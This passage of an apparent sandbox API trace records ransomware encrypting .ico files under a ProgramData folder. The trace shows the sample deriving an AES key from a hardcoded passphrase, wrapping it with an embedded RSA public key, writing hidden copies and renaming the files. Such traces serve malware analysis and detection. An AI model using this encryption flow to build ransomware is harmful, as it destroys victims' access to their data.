Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", dwFileAttributes=0x80) returned 0 [0236.800] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.800] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.800] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.800] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.806] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.807] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.807] CryptHashData (hHash=0x2817118, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.807] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817298) returned 1 [0236.807] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.807] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.807] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28154c8) returned 1 [0236.809] CryptImportPublicKeyInfo (in: hCryptProv=0x28154c8, dwCertEncodingType=0x1, pInfo=0x280a850*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a880*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a888*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28176d8) returned 1 [0236.809] CryptEncrypt (in: hKey=0x28176d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.810] CryptEncrypt (in: hKey=0x28176d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815330*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815330*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.810] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815330, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.810] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.810] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.810] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.810] CloseHandle (hObject=0xffffffff) returned 1 [0236.810] CloseHandle (hObject=0xffffffff) returned 1 [0236.810] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), bFailIfExists=0) returned 0 [0236.810] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", dwFileAttributes=0x0) returned 0 [0236.811] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.gsg")) returned 0 [0236.811] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.fuck")) returned 0 [0236.811] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.811] CryptDestroyKey (hKey=0x2817298) returned 1 [0236.811] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.812] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.812] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.812] GetLastError () returned 0x5 [0236.812] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico")) returned 0x20 [0236.812] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", dwFileAttributes=0x80) returned 0 [0236.812] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.813] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.813] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.813] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x27e9548) returned 1 [0236.818] CryptCreateHash (in: hProv=0x27e9548, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.818] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.818] CryptHashData (hHash=0x2817118, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.818] CryptDeriveKey (in: hProv=0x27e9548, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28171d8) returned 1 [0236.818] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.818] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.819] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2816980) returned 1 [0236.820] CryptImportPublicKeyInfo (in: hCryptProv=0x2816980, dwCertEncodingType=0x1, pInfo=0x280ab90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280abc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280abc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817558) returned 1 [0236.820] CryptEncrypt (in: hKey=0x2817558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.820] CryptEncrypt (in: hKey=0x2817558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28153b8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28153b8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.820] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28153b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.820] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.820] CryptEncrypt (in: hKey=0x28171d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.820] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.820] CloseHandle (hObject=0xffffffff) returned 1 [0236.820] CloseHandle (hObject=0xffffffff) returned 1 [0236.820] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), bFailIfExists=0) returned 0 [0236.821] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", dwFileAttributes=0x0) returned 0 [0236.821] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.gsg")) returned 0 [0236.821] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.fuck")) returned 0 [0236.822] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.822] CryptDestroyKey (hKey=0x28171d8) returned 1 [0236.822] CryptReleaseContext (hProv=0x27e9548, dwFlags=0x0) returned 1 [0236.822] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.822] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.822] GetLastError () returned 0x5 [0236.822] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico")) returned 0x20 [0236.822] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", dwFileAttributes=0x80) returned 0 [0236.822] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.823] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.823] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.826] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2793100) returned 1 [0236.831] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.831] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.831] CryptHashData (hHash=0x2817118, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.831] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28171d8) returned 1 [0236.831] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.831] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.831] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815880) returned 1 [0236.832] CryptImportPublicKeyInfo (in: hCryptProv=0x2815880, dwCertEncodingType=0x1, pInfo=0x280a780*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a7b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a7b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817618) returned 1 [0236.832] CryptEncrypt (in: hKey=0x2817618, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.832] CryptEncrypt (in: hKey=0x2817618, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9548*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x27e9548*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9548, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.833] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.833] CryptEncrypt (in: hKey=0x28171d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.833] CloseHandle (hObject=0xffffffff) returned 1 [0236.833] CloseHandle (hObject=0xffffffff) returned 1 [0236.833] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), bFailIfExists=0) returned 0 [0236.833] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", dwFileAttributes=0x0) returned 0 [0236.834] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.gsg")) returned 0 [0236.834] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.fuck")) returned 0 [0236.834] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.834] CryptDestroyKey (hKey=0x28171d8) returned 1 [0236.834] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0236.834] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.834] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.834] GetLastError () returned 0x5 [0236.835] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico")) returned 0x20 [0236.835] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", dwFileAttributes=0x80) returned 0 [0236.836] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.836] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.836] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.836] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2793100) returned 1 [0236.841] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.841] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.841] CryptHashData (hHash=0x2817118, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.841] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817298) returned 1 [0236.842] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.842] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.842] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2832fb0) returned 1 [0236.843] CryptImportPublicKeyInfo (in: hCryptProv=0x2832fb0, dwCertEncodingType=0x1, pInfo=0x280a9f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280aa20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280aa28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817698) returned 1 [0236.843] CryptEncrypt (in: hKey=0x2817698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.843] CryptEncrypt (in: hKey=0x2817698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832bf8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2832bf8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.843] 